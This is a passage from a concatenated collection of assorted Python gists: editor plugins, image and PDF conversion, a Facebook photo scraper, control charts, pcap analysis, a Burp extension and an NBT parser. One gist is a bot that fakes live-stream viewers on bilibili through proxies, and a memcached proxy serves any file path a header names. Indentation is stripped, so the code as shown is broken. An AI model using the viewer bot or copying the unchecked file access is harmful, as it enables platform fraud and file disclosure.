# database size on disk: 4330426472 = 4.0 GB
```
#### File: hard-gists/6808772/snippet.py
```python
import sublime, sublime_plugin
class Copy_on_select(sublime_plugin.EventListener):
def on_selection_modified(self, view):
for region in view.sel():
if not region.empty():
print(view.substr(region))
view.run_command('copy')
```
#### File: hard-gists/6843565/snippet.py
```python
from __future__ import division, print_function
import Image
class Wallmask(object):
def __init__(self):
self.load_wallmask("Maps/ctf_dirtbowl_v2.png")
self.name = "ctf_dirtbowl_v2"
def load_wallmask(self, name):
print("---LOADING WALLMASK---")
image = Image.open(name)
for key, value in image.text.items():
if key == "Gang Garrison 2 Level Data":
text = value
break
text = text[text.find("{WALKMASK}\n")+len("{WALKMASK}\n"):text.find("\n{END WALKMASK}")]
index = text.find("\n")
self.width = int(text[:index])
text = text[index+1:]
index = text.find("\n")
self.height = int(text[:index])
text = text[index+1:]
self.mask = [[False for j in range(self.height)] for i in range(self.width)]
self.uncompress_wallmask_data(text)
large_mask = [[False for j in range(len(self.mask[0])*6)] for i in range(len(self.mask)*6)]
for i in range(len(self.mask)*6):
for j in range(len(self.mask[0])*6 - 7):
large_mask[i][j] = self.mask[int(i/6)][int(j/6)]
self.mask = large_mask
self.width = len(self.mask)
self.height = len(self.mask[0])
def uncompress_wallmask_data(self, data):
bitmask = 0x1
index = len(data)-1
value = ord(data[index]) - 32
for i in range(len(data)*6 - self.width*self.height):
bitmask *= 2
for y in range(self.height-1, -1, -1):
for x in range(self.width-1, -1, -1):
if bitmask == 64:
index -= 1
bitmask = 0x1
value = ord(data[index]) - 32
if value & bitmask:
self.mask[x][y] = True
bitmask *= 2
def print_wallmask(self):
n_image = Image.new("L", (self.width, self.height))
for x in range(self.width):
for y in range(self.height):
if self.mask[x][y]:
n_image.putpixel((x, y), 0)
else:
n_image.putpixel((x, y), 255)
n_image.save("output.png")
```
#### File: hard-gists/691e97ce22f7cd43d6a9d54305344587/snippet.py
```python
from PIL import Image as Img
from wand.image import Image
import uuid
import numpy as np
import glob
import os
import sys
def convert(filepdf):
#used to generate temp file name. so we will not duplicate or replace anything
uuid_set = str(uuid.uuid4().fields[-1])[:5]
try:
#now lets convert the PDF to Image
#this is good resolution As far as I know
with Image(filename=filepdf, resolution=200) as img:
#keep good quality
img.compression_quality = 80
#save it to tmp name
img.save(filename="temp/temp%s.jpg" % uuid_set)
except Exception, err:
#always keep track the error until the code has been clean
#print err
return False
else:
"""
We finally success to convert pdf to image.
but image is not join by it self when we convert pdf files to image.
now we need to merge all file
"""
pathsave = []
try:
#search all image in temp path. file name ends with uuid_set value
list_im = glob.glob("temp/temp%s*.jpg" % uuid_set)
list_im.sort() #sort the file before joining it
imgs = [Img.open(i) for i in list_im]
#now lets Combine several images vertically with Python
min_shape = sorted([(np.sum(i.size), i.size) for i in imgs])[0][1]
imgs_comb = np.vstack(
(np.asarray(i.resize(min_shape)) for i in imgs))
# for horizontally change the vstack to hstack
imgs_comb = Img.fromarray(imgs_comb)
pathsave = "MyPdf%s.jpg" % uuid_set
#now save the image
imgs_comb.save(pathsave)
#and then remove all temp image
for i in list_im:
os.remove(i)
except Exception, err:
#print err
return False
return pathsave
if __name__ == "__main__":
arg = sys.argv[1]
result = convert(arg)
if result:
print "[*] Succces convert %s and save it to %s" % (arg, result)
else:
print "[!] Whoops. something wrong dude. enable err var to track it"
"""
===========================================
Running Test:
python testing-pdf.py zz.pdf
[*] Succces convert zz.pdf and save it to Resume63245.jpg
===========================================
"""
#well I hope this will be useful for you & others.
```
#### File: hard-gists/6b2273d7e332f29193d0/snippet.py
```python
import sys
import time
import getopt
from multiprocessing import Process
from websocket import create_connection, WebSocketConnectionClosedException, WebSocketProxyException, WebSocketException
import random
import re
import traceback
import socket
global proxy_list
#----------------------------------------------------------------------
def fake_connector(cid, is_proxy = False):
""""""
try:
if is_proxy:
proxy_server = random.choice(proxy_list)
host, port = proxy_server.split(':')
ws = create_connection('ws://livecmt.bilibili.com:88/{cid}'.format(cid = cid), http_proxy_host = host, http_proxy_port = int(port))
else:
ws = create_connection('ws://livecmt.bilibili.com:88/{cid}'.format(cid = cid))
while 1:
time.sleep(5)
a = ws.recv()
except (WebSocketProxyException, socket.error, TypeError): #proxy server died
#/usr/local/lib/python2.7/site-packages/websocket/_http.py L186 WTF????
print(proxy_server + ' died!')
try:
proxy_list.remove(proxy_server)
except Exception, err:
print(traceback.format_exc())
except (WebSocketConnectionClosedException, WebSocketException):
return -1
except Exception, err:
print(traceback.format_exc())
return 0
finally:
return
#----------------------------------------------------------------------
def main(cid, thread_number, is_proxy = False):
""""""
#Get a list of threads
process_list = [Process(target=fake_connector, args=((cid, is_proxy, ))) for i in xrange(int(thread_number))] #Queue? Your ass
[i.start() for i in process_list] #ignite every one
try:
while 1:
alive_list = [i.is_alive() for i in process_list]
print('Active thread: ' + str(len(alive_list)))
death_position_list = [i for i, x in enumerate(alive_list) if x == False]
if len(death_position_list) > 0: #someone died
print('Some died, adding {COUNT} new threads'.format(COUNT = len(death_position_list)))
for i in death_position_list:
del process_list[i] #remove body
process_list.append(Process(target=fake_connector, args=((cid, is_proxy, ))))
process_list[-1].start() #ignite
time.sleep(3)
except Exception as e:
print(e)
for i in process_list:
try:
i.terminate() #ensure safe exit
except:
pass
exit()
#----------------------------------------------------------------------
def proxy_file_to_list(proxy_file):
"""fileIO->list
file:
192.168.3.11:80
172.16.58.3:9000
192.168.127.12:8090
172.16.31.10:8118
172.16.58.3:8888
list:
['192.168.3.11:80', '172.16.58.3:9000', '192.168.127.12:8090',...
"""
final_list = []
pattern = re.compile(r'\d+.\d+.\d+.\d+:\d+') #172.16.31.10:8123
with open(proxy_file, 'r') as file_this:
final_list = [line.strip() for line in file_this if pattern.match(line)]
return final_list
#----------------------------------------------------------------------
def usage():
""""""
print('''Use as:
-c: cid, room number
-t: thread number
-p: proxy file
Press Ctrl+C to exit.
''')
if __name__=='__main__':
is_proxy = False
argv_list = sys.argv[1:]
try:
opts, args = getopt.getopt(argv_list, "hc:t:p:",
['help', "cid=", 'thread_number=', 'proxy_file='])
except getopt.GetoptError:
usage()
exit()
for o, a in opts:
if o in ('-h', '--help'):
usage()
exit()
if o in ('-c', '--cid'):
cid = a
if o in ('-t', '--thread_number'):
thread_number = int(a)
if o in ('-p', '--proxy_file'):
is_proxy = True
proxy_file = a
if is_proxy:
proxy_list = proxy_file_to_list(proxy_file)
print('Getting room {cid} {thread_number} viewers...'.format(cid = cid, thread_number = thread_number))
main(cid, thread_number, is_proxy)
```
#### File: hard-gists/6bb9ddb5d904b7275c62/snippet.py
```python
import commands
import json
import os
import sys
import urllib
import dateutil.parser
import magic
import requests
########################### CUSTOMIZE THIS ###########################
page_id = "567045406742962"
access_token = "app_id|app_secret" # see https://developers.facebook.com/docs/facebook-login/access-tokens#apptokens
dest = os.path.expanduser("~/img/sns/apink-official-facebook")
website_title = "apink-official-facebook"
######################################################################
if not os.path.exists(dest):
os.makedirs(dest)
# read last update time, if it is available
last_update_record = dest + "/last_update_timestamp"
if os.path.exists(last_update_record):
f = open(last_update_record, "r")
last_update_timestamp = f.readline()
f.close()
last_update_time = dateutil.parser.parse(last_update_timestamp)
else:
last_update_time = dateutil.parser.parse("1970-01-01T00:00+00:00")
# this function makes an API call with only an access_token (which
# could be just app-id|app-secret)
def fb_public_call(endpoint, params, access_token):
params["access_token"] = access_token
response = requests.get("https://graph.facebook.com/" + endpoint,
params=params)
return response.json()
# this function downloads a photo
# return codes are defined below
SUCCESS = 0
FAILED_DOWNLOAD = 1
UNRECOGNIZED_MIME = 2
OLD_PHOTO = 255 # photo older than last update time
def handle_photo(photo, album_id):
# print information
photo_id = photo["id"]
time = dateutil.parser.parse(photo["created_time"])
if time < last_update_time:
return OLD_PHOTO
time_print = time.strftime("%b %d, %Y")
time_full = time.strftime("%Y%m%d%H%M%S")
original_image = photo["images"][0]
height = original_image["height"]
width = original_image["width"]
format_string = "date: %s id: %s size: %sx%s"
print format_string % (time_print, photo_id, width,
height)
# download file
source_uri = original_image["source"]
filename = time_full + "-" + website_title + "-" + \
album_id + "-" + photo_id
filepath = dest + "/" + filename
urllib.urlretrieve(source_uri, filepath)
# identify mime type and attach extension
if os.path.exists(filepath):
mime = magic.from_file(filepath, mime=True)
if mime == "image/gif":
newfilepath = filepath + ".gif"
elif mime == "image/jpeg":
newfilepath = filepath + ".jpg"
elif mime == "image/png":
newfilepath = filepath + ".png"
else:
err = filepath + ": error: " + \
"unrecgonized image type\n"
sys.stderr.write(err)
return UNRECOGNIZED_MIME
os.rename(filepath, newfilepath)
return SUCCESS
else:
# donwload failed for whatever reason
err = "error: " + filename + " failed to " + \
"downloaded from " + source_uri + "\n"
sys.stderr.write(err)
return FAILED_DOWNLOAD
# this function handles an album, i.e., download newly added photos
# since the last update
def handle_album(album):
# print album info
album_id = album["id"]
format_string = "downloading album \"%s\" " + \
"(album id: %s; photo count: %s)"
print format_string % (album["name"], album_id,
album["count"])
print "-" * 80
# retrieve photos in the album
photos_response = fb_public_call(album["id"] + "/photos",
params, access_token)
while True:
for photo in photos_response["data"]:
if handle_photo(photo, album_id) == OLD_PHOTO:
# already encountered old photo in this album
# no need to look further into the past
print
return
if "next" in photos_response["paging"]:
next_uri = photos_response["paging"]["next"]
photos_response = requests.get(next_uri).json()
else:
break
print
params = {}
# retrieve albums
albums_response = fb_public_call(page_id + "/albums", params,
access_token);
while True:
for album in albums_response["data"]:
handle_album(album)
if "next" in albums_response["paging"]:
next_uri = albums_response["paging"]["next"]
albums_response = requests.get(next_uri).json()
else:
break
# update feature yet to be implemented
# create a file "last_update_timestamp" for future use
f = open(last_update_record, "w")
f.write(commands.getoutput("date -u --iso-8601=seconds"))
f.close()
```
#### File: hard-gists/6cd16631253eed21f37f/snippet.py
```python
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
"""
from pylab import *
from math import *
import time as py_time
import datetime as py_datetime
#from control_chart_data_parser import *
from cccp_const import *
from cccp_ex import *
from cccp_types import *
def xtend( x ):
ar = []
for t in r.sample_times:
ar.append(x)
return ar
def rside_txt( xmax, val, txt, loc=None ):
if loc == None:
loc = val
text( xmax*1.02, loc, txt%val )
version = 1.0
script_name = sys.argv[0]
valid_machines = [ "qranky_1", "qranky_2", "igor_1", "example" ]
help_str = """
About:
CCCP is Control Charts in Python
%s, Version %3.1f
Quarq Technology / SRAM LLC
<NAME>
Licensed under GPL V2
Example: %s -f=qranky_1
Options:
--help ( -? ) Prints this message.
--machine= ( -m= ) Specify test machine from following:
%s
--file ( -f= ) Specify CSV file to import from.
--verbose ( -v ) More verbose output.
--license ( -l ) Prints GPL license notification.
""" % ( script_name, version, script_name, valid_machines )
class Control_Chart:
def __init__( self ):
self.verbose = False
self.outpath = "outputs/"
self.time_ran = py_time.localtime()
self.infile = None
self.tol = 0.05 # Sets axis on mean plot
# Given a data set, determine which samples are in violation
# of the common Western Electric control chart rules
def western_electric_rules( self, r ):
# Points outside the +/- 3 sigma control limits
def get_3s_violators( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r
lcl = r.mean - A2r
return get_m_of_n_runs( r.sample_means, 1, 1, lcl, ucl )
## Two out of three consecutive points outside
## the +/- 2 sigma limits
def get_2s_runs( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r*2.0/3.0
lcl = r.mean - A2r*2.0/3.0
return get_m_of_n_runs( r.sample_means, 2, 3, lcl, ucl )
## Four out of five consecutive points outside
## the +/- 1 sigma limits
def get_1s_runs( r ):
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r/3.0
lcl = r.mean - A2r/3.0
return get_m_of_n_runs( r.sample_means, 4, 5, lcl, ucl )
## Eight consecutive points on the same side
## of the center line.
def get_mean_runs( r ):
ucl = r.mean
lcl = r.mean
return get_m_of_n_runs( r.sample_means, 8, 8, lcl, ucl )
def get_m_of_n_runs( data, m, n, lcl, ucl ):
t, s = [], []
for i in range(n,len(data)+1,1):
set = data[i-n:i]
if n_of_set( set, m, 'gt', ucl ) or \
n_of_set( set, m, 'lt', lcl ):
t.append( r.sample_times[i-n:i] )
s.append( data[i-n:i] )
return t, s
# Checks if 'n' items in a set are greater than 'lim', etc.
# 'expr' parameter specifies conditional relation of 'set items
# to 'lim'
def n_of_set( set, n, expr = 'gt', lim = 0.0 ):
ct = 0
for i in set:
if expr == 'gt':
if i > lim:
ct += 1
elif expr == 'lt':
if i < lim:
ct += 1
elif expr == 'gte':
if i <= lim:
ct += 1
elif expr == 'lte':
if i <= lim:
ct += 1
if ct >= n:
return True
else:
return False
if False: # Test for WE rules function
data = [ 0.0, 0.0, 2.0, 3.0, 3.0, 2.0, 2.0, 3.0, \
3.0, 2.0, 2.0, 2.0, 3.0, 7.0 ]
m = 3
for i in range(m,len(data)+1,1):
set = data[i-m:i]
print set,
if n_of_set( set, n=2, expr='gt', lim=2.5 ):
print "!"
else:
print
## Get all of the violating series..
out_of_ctrl_samples = []
out_of_ctrl_times = []
if True:
for f in [ get_3s_violators, get_mean_runs, \
get_2s_runs, get_1s_runs ]:
t, s = f( r )
out_of_ctrl_times.append(t)
out_of_ctrl_samples.append(s)
print "Out of control points detected:"
print f
print s, "@", t
print
return out_of_ctrl_times, out_of_ctrl_samples
def plot_means( self, r ):
r.update_all()
# Use mean of sample ranges
ss = len(r.samples[0].measurements)
A2r = const_A2[ ss ]*r.range
ucl = r.mean + A2r
lcl = r.mean - A2r
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
if True:
plot( r.sample_times, xtend(r.mean + A2r/3.0), linewidth=1.0, c='b', alpha=0.25 )
plot( r.sample_times, xtend(r.mean - A2r/3.0), linewidth=1.0, c='b', alpha=0.25 )
plot( r.sample_times, xtend(r.mean + A2r*2.0/3.0), linewidth=1.0, c='y', alpha=0.25 )
plot( r.sample_times, xtend(r.mean - A2r*2.0/3.0), linewidth=1.0, c='y', alpha=0.25 )
plot( r.sample_times, xtend(r.mean), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_means, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*(1-self.tol),ucl*(1+self.tol)])
rside_txt(tmax, ucl, "UCL=%5.3f")
rside_txt(tmax, lcl, "LCL=%5.3f")
rside_txt( tmax, r.mean, "Nominal=%5.3f" )
span = ((ucl-lcl)/r.mean )*100.0
rside_txt( tmax, span, "Span=%5.3f%%", lcl*(1-self.tol))
#xlabel('Time')
ylabel('Means', fontsize=18)
grid(False)
def plot_western_electric_overlay( self ):
# Find points that are out of control based on rules and
# overlay these points with big red blobs
out_of_ctrl_times, out_of_ctrl_samples = \
self.western_electric_rules( r )
if self.verbose and len(out_of_ctrl_samples) :
print "Overlaying out-of-control points.."
for rule in range(0, len(out_of_ctrl_samples)):
t, s = out_of_ctrl_times[rule], out_of_ctrl_samples[rule]
if len(s) > 0:
scatter(t, s, s=250, c='r', alpha=0.5)
def plot_ranges( self, r ):
r.update_all()
ss = len(r.samples[0].measurements)
ucl = r.range * const_D4[ss]
lcl = r.range * const_D3[ss]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(r.range), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_ranges, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*0.66, ucl*1.25])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f" )
rside_txt( tmax, r.range, "Nominal=%5.3f" )
#xlabel('Time')
ylabel('Ranges', fontsize=18)
grid(True)
# Achtung: Need to figure out how to properly compute stdevs
# and what factors to use and what they do...
def plot_stdevs( self, r ):
r.update_all()
ss = len(r.samples[0].measurements)
ucl = r.stdev * const_B4[ss]
lcl = r.stdev * const_B3[ss]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(r.stdev), linewidth=2.0, c='b' )
plot( r.sample_times, r.sample_stdevs, marker='^', c='k')
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*0.666, ucl*1.25])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f")
rside_txt( tmax, r.stdev, "Nominal=%5.3f" )
grid(True)
def plot_cusum( self, r, target_mean, k=0.5, h=4 ):
r.update_all()
# Control limits
ss = len(r.samples[0].measurements)
# Adjust sample stdev to estimated population stdev
sigma = r.stdev * const_A3[ss] / 3.0
ucl = h*sigma
lcl = -1.0 * ucl
# Compute cumulative sums
su, sl = [0], [0]
for x in r.sample_means:
su.append( max( 0, x - target_mean - k*sigma + su[-1] ) )
sl.append( min( 0, x - target_mean + k*sigma + sl [-1]) )
# Trim the first zeros off..
su = su[1:]
sl = sl[1:]
plot( r.sample_times, xtend(ucl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(lcl), linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, su, marker='^', c='k' )
plot( r.sample_times, sl, marker='^', c='k' )
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#axis([tmin, tmax, lcl*1.1, ucl*1.1])
rside_txt( tmax, ucl, "UCL=%5.3f" )
rside_txt( tmax, lcl, "LCL=%5.3f" )
rside_txt( tmax, target_mean, "Target=%5.3f")
grid(True)
def plot_p_attr( self, r ):
r.update_all()
#r.pretty_print(True,False)
# Control limits
ss = len(r.samples[0].measurements)
mean_p = r.get_mean_proportion_defective()
#print "--> mean_p:", mean_p
# Compute upper and lower control lims
ucl, lcl = [], []
for s in r.samples:
s.update_all()
n = len( s.measurements ) #Sample size
q = 3*sqrt( mean_p*(1-mean_p)/n )
ucl.append( mean_p + q )
lcl.append( max( 0, mean_p - q ) )
plot( r.sample_times, ucl, linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, lcl, linewidth=4.0, c='r', alpha=0.5 )
plot( r.sample_times, xtend(mean_p), linewidth=2.0, c='b' )
plot( r.sample_times, r.defect_proportions, marker='^', c='k',
linewidth=2.0)
tmin = min(r.sample_times)
tmax = max(r.sample_times)
#ymin = min(lcl)*0.8
ymin = 0
#([tmin, tmax, ymin, max(ucl)*1.2])
rside_txt( tmax, mean_p, "Mean=%5.3f")
text( tmax*1.02, ucl[-1], "UCL" )
text( tmax*1.02,lcl[-1], "LCL" )
grid(True)
def save_plots( self, stitle ):
savefig("%s%s_%s.png"% (self.outpath, stitle, \
py_time.strftime("%Y-%m-%d_%H-%M-%S", self.time_ran) ) )
savefig("%scurrent_%s.png"% (self.outpath, stitle) )
def make_xbar_plot( self, r, stitle, p2='range', cusum=False ):
figure(1, figsize=(18, 8), dpi=80, facecolor='w', edgecolor='k')
suptitle(stitle, fontsize=20)
#years = YearLocator() # every year
#months = MonthLocator() # every month
#yearsFmt = DateFormatter('%Y')
if cusum:
subplot(311)
else:
subplot(211)
title('Generated %s' % py_time.strftime("%Y/%m/%d, %H:%M", \
self.time_ran) )
self.plot_means(r)
#self.plot_western_electric_overlay()
if cusum:
subplot(312)
else:
subplot(212)
if p2 in ('r', 'range'):
self.plot_ranges(r)
ylabel('Std. Devs.', fontsize=18)
elif p2 in ('s', 'stdev'):
self.plot_stdevs(r)
ylabel('Std. Devs.', fontsize=18)
if cusum:
subplot(313)
self.plot_cusum(r, 10.0, k=0.5, h=4 )
ylabel('CUSUM', fontsize=18)
xlabel('Time', fontsize=18)
self.save_plots(stitle)
if self.verbose:
show()
def make_attr_chart( self, r, stitle ):
figure(1, figsize=(18, 8), dpi=80, facecolor='w', edgecolor='k')
suptitle(stitle, fontsize=20)
subplot(111)
title('Generated %s' % py_time.strftime("%Y/%m/%d, %H:%M", \
self.time_ran) )
self.plot_p_attr(r)
xlabel('Time', fontsize=18)
ylabel('Proportion', fontsize=18)
self.save_plots(stitle)
if self.verbose:
show()
#_______________________ M A I N __ P R O G R A M _____________________#
if __name__=="__main__":
cc = Control_Chart()
# Parse command-line arguements
for arg in sys.argv:
if arg in ['-?', '-h', '-help', '--help']:
print help_str
exit(0)
if arg in [ "-l", "--license"]:
print license_str
exit(0)
if arg in ["-v", "--verbose"]:
cc.verbose = True
if arg.startswith("-m=") or arg.startswith("--machine="):
cc.machine_name = arg.rsplit( "=", 1 )[1]
if not cc.machine_name in valid_machines:
print "Please specify one of the following:", \
valid_machines
exit(-1)
if arg.startswith("-f=") or arg.startswith("--file="):
cc.infile = arg.rsplit( "=", 1 )[1]
# x-bar/R chart example from Foster Text
if False:
r = import_time_value_arrays( times=[], \
values=example_data_foster_18_11, sample_size=4 )
r.pretty_print(True, True)
t = 'Figure 11-8 from Foster Text'
cc.make_xbar_plot(r, t, p2='range')
# p chart example from Foster Text
elif False:
r = get_example_data_foster_12_1()
t = 'Example 12-1 from Foster Text'
cc.make_attr_chart( r, stitle=t )
# Example of calibration drift and CUSUM chart
elif True:
d = get_calibration_example_data()
r = import_time_value_arrays( times=[], \
values=d, sample_size=4 )
t = 'Calibration Control Chart'
cc.make_xbar_plot(r, t, p2='range', cusum=True )
else:
if cc.infile == None:
print "Please specify a data file."
exit(0)
else:
t, m = import_csv_to_arrays( cc.infile )
r = import_time_value_arrays( t, m, sample_size=4 )
t = ('Control Chart')
cc.make_attr_chart( r, stitle=t )
```
#### File: hard-gists/6d459a8c2ae945808d69/snippet.py
```python
import dpkt
import humanfriendly
import nids
import pandas as pd
import socket
import sys
conv = {}
ip_to_domain = {}
end_states = (nids.NIDS_CLOSE, nids.NIDS_TIMEOUT, nids.NIDS_RESET)
def handle_tcp_stream(tcp):
ports = [80, 443]
if tcp.addr[1][1] not in ports:
return
global conv
if tcp.nids_state == nids.NIDS_JUST_EST:
tcp.client.collect = 1
tcp.server.collect = 1
elif tcp.nids_state == nids.NIDS_DATA:
tcp.discard(0)
elif tcp.nids_state in end_states:
ip = tcp.addr[1][0]
conv.setdefault(ip, 0)
conv[ip] += len(tcp.client.data[:tcp.client.count]) + len(tcp.server.data[:tcp.server.count])
def udp_callback(addrs, payload, pkt):
if addrs[0][1] != 53:
return
dns = dpkt.dns.DNS(payload)
global ip_to_domain
for q in dns.qd:
domain = q.name
for a in dns.an:
try:
ip_to_domain[socket.inet_ntoa(a.ip)] = domain
except AttributeError:
pass
return
def extract(pcap_file):
nids.param("tcp_workarounds", 1)
nids.param("scan_num_hosts", 0) # disable portscan detection
nids.chksum_ctl([('0.0.0.0/0', False)]) # disable checksumming
nids.param("filename", pcap_file)
nids.init()
nids.register_tcp(handle_tcp_stream)
nids.register_udp(udp_callback)
try:
nids.run()
except Exception, e:
print "Exception ", pcap_file + " ", e
data = []
columns = ('name', 'bytes', 'human_bytes')
for ip, byte in conv.iteritems():
name = ip_to_domain[ip] if ip in ip_to_domain else ip
data.append([name, byte, humanfriendly.format_size(byte)])
df = pd.DataFrame(data, columns=columns)
df = df.sort('bytes', ascending=False)
return df
if __name__ == "__main__":
print extract(sys.argv[1])
```
#### File: hard-gists/6e20dba959277bd9af77/snippet.py
```python
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
from sklearn.metrics import roc_auc_score
import xgboost as xgb
from hyperopt import hp, fmin, tpe, STATUS_OK, Trials
train = dataiku.Dataset("train").get_dataframe()
valid = dataiku.Dataset("valid").get_dataframe()
y_train = train.target
y_valid = valid.target
del train["target"]
del valid["target"]
def objective(space):
clf = xgb.XGBClassifier(n_estimators = 10000,
max_depth = space['max_depth'],
min_child_weight = space['min_child_weight'],
subsample = space['subsample'])
eval_set = [( train, y_train), ( valid, y_valid)]
clf.fit(train[col_train], y_train,
eval_set=eval_set, eval_metric="auc",
early_stopping_rounds=30)
pred = clf.predict_proba(valid)[:,1]
auc = roc_auc_score(y_valid, pred)
print "SCORE:", auc
return{'loss':1-auc, 'status': STATUS_OK }
space ={
'max_depth': hp.quniform("x_max_depth", 5, 30, 1),
'min_child_weight': hp.quniform ('x_min_child', 1, 10, 1),
'subsample': hp.uniform ('x_subsample', 0.8, 1)
}
trials = Trials()
best = fmin(fn=objective,
space=space,
algo=tpe.suggest,
max_evals=100,
trials=trials)
print best
```
#### File: hard-gists/701904/snippet.py
```python
import memcache, urllib, os
import SocketServer, SimpleHTTPServer
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn
PORT = 9876
DEBUG = False
MEMCACHED = ['127.0.0.1:11211']
class Proxy(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if None != self.headers['X-Memcached-Path']:
path = self.headers['X-Memcached-Path']+self.path
if os.path.isfile(path):
try:
self.copyfile(urllib.urlopen(path), self.wfile)
except IOError:
if DEBUG:
print "Error: cannot write stream"
f = open(path, 'rb')
mc.set(self.headers['X-Memcached-Key'], f.read(), int(self.headers['X-Memcached-Expires']))
f.close()
if DEBUG:
print path+" stored for "+self.headers['X-Memcached-Expires']+"s"
else:
if DEBUG:
print path+" not found or is a directory"
def finish(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.finish(self)
except IOError, e:
if e.errno != 32 and DEBUG:
print 'Error: broken pipe'
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
mc = memcache.Client(MEMCACHED, debug=0)
httpd = ThreadedHTTPServer(('', PORT), Proxy)
httpd.daemon_threads = True
httpd.allow_reuse_address = 1
if DEBUG:
print "Serving at port", PORT
httpd.serve_forever()
```
#### File: hard-gists/7026954/snippet.py
```python
from java.awt import Font
from javax.swing import JScrollPane, JTextPane
from javax.swing.text import SimpleAttributeSet
from burp import IBurpExtender, IExtensionStateListener, IHttpListener, ITab
import base64
import traceback
class BurpExtender(IBurpExtender, IExtensionStateListener, IHttpListener, ITab):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.helpers
self.scriptpane = JTextPane()
self.scriptpane.setFont(Font('Monospaced', Font.PLAIN, 11))
self.scrollpane = JScrollPane()
self.scrollpane.setViewportView(self.scriptpane)
self._code = compile('', '<string>', 'exec')
self._script = ''
script = callbacks.loadExtensionSetting('script')
if script:
script = base64.b64decode(script)
self.scriptpane.document.insertString(
self.scriptpane.document.length,
script,
SimpleAttributeSet())
self._script = script
self._code = compile(script, '<string>', 'exec')
callbacks.registerExtensionStateListener(self)
callbacks.registerHttpListener(self)
callbacks.customizeUiComponent(self.getUiComponent())
callbacks.addSuiteTab(self)
self.scriptpane.requestFocus()
def extensionUnloaded(self):
try:
self.callbacks.saveExtensionSetting(
'script', base64.b64encode(self._script))
except Exception:
traceback.print_exc(file=self.callbacks.getStderr())
return
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
try:
globals_ = {}
locals_ = {'extender': self,
'callbacks': self.callbacks,
'helpers': self.helpers,
'toolFlag': toolFlag,
'messageIsRequest': messageIsRequest,
'messageInfo': messageInfo
}
exec(self.script, globals_, locals_)
except Exception:
traceback.print_exc(file=self.callbacks.getStderr())
return
def getTabCaption(self):
return 'Script'
def getUiComponent(self):
return self.scrollpane
@property
def script(self):
end = self.scriptpane.document.length
_script = self.scriptpane.document.getText(0, end)
if _script == self._script:
return self._code
self._script = _script
self._code = compile(_script, '<string>', 'exec')
return self._code
```
#### File: hard-gists/706573/snippet.py
```python
from struct import unpack
import Image
tag_types = { 0 : 'End',
1 : 'Byte',
2 : 'Short',
3 : 'Int',
4 : 'Long',
5 : 'Float',
6 : 'Double',
7 : 'Byte array',
8 : 'String',
9 : 'List',
10 : 'Compound'}
# Read number and type of list items and print them
def read_list_payload(chunk):
list_item_type = ord(chunk.read(1))
list_length = unpack('>l', chunk.read(4))[0]
print "%d items of type %s" % (list_length, tag_types[list_item_type])
def read_byte(chunk):
return ord(chunk.read(1))
def read_short(chunk):
return unpack('>h', chunk.read(2))[0]
def read_int(chunk):
return unpack('>l', chunk.read(4))[0]
def read_long(chunk):
return unpack('>q', chunk.read(8))[0]
def read_byte_array(chunk):
length = read_int(chunk)
print "Array length: %d" % length
payload = chunk.read(length)
return payload
def read_compound(chunk):
payload = []
tag = read_tag(chunk)
payload.append(tag)
tag_type = tag[0]
while (tag_type > 0):
tag = read_tag(chunk)
payload.append(tag)
tag_type = tag[0]
print "Read %d elements in compound" % len(payload)
return payload
def read_string(chunk):
str_length = unpack('>h', chunk.read(2))[0]
if (str_length > 0):
str = chunk.read(str_length)
#print "Name: %s" % name
else:
str = None
return str
# Read entire tag
def read_tag(chunk):
type = ord(chunk.read(1)) # Chunk starts with "10" byte
print "Found tag type: %s" % (tag_types[type], )
if (type > 0):
name = read_string(chunk)
if (name != None):
print "Name: %s" % name
else:
name = ''
payload = None
# Read payload of each tag. "0" tag has no payload
if (type == 1):
payload = read_byte(chunk)
elif (type == 2):
payload = read_short(chunk)
elif (type == 3):
payload = read_int(chunk)
elif (type == 4):
payload = read_long(chunk)
elif (type == 5): # no separate float for now
payload = read_long(chunk)
elif (type == 6): # no separate double for now
payload = read_long(chunk)
